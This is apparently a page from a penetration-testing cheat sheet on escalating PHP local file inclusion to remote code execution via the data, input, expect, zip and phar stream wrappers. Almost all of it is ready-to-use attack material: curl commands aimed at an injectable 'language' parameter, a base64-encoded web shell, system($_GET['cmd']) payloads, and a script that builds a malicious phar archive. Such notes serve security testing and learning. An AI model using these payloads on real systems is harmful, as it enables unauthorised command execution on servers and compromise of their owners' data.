PHP Wrappers

Data Wrapper

Pre-requisites

allow_url_include must be enabled

(/etc/php/X.Y/apache2/php.ini) for Apache

(/etc/php/X.Y/fpm/php.ini) for Nginx

where x.y is the php version

Remote Code Execution

$ curl -s "http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id"

Input Wrapper

Pre-requisites

allow_url_include must be enabled

Remote Code Execution

$ curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"

Expect Wrapper

Pre-requisites

extension=expect

Remote Code Execution

$ curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"

Zip Wrapper

$ echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.zip shell.php
$ curl -s "http://<SERVER_IP>:<PORT>/index.php?language=zip://shell.zip%23shell.php&cmd=id"

Phar Wrapper

<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();

$ php --define phar.readonly=0 shell.php && mv shell.phar shell.zip
$ curl -s "http://<SERVER_IP>:<PORT>/index.php?language=phar://shell.zip%2Fshell.txt&cmd=id"

PreviousPHP Filters NextRFI

Last updated 2 years ago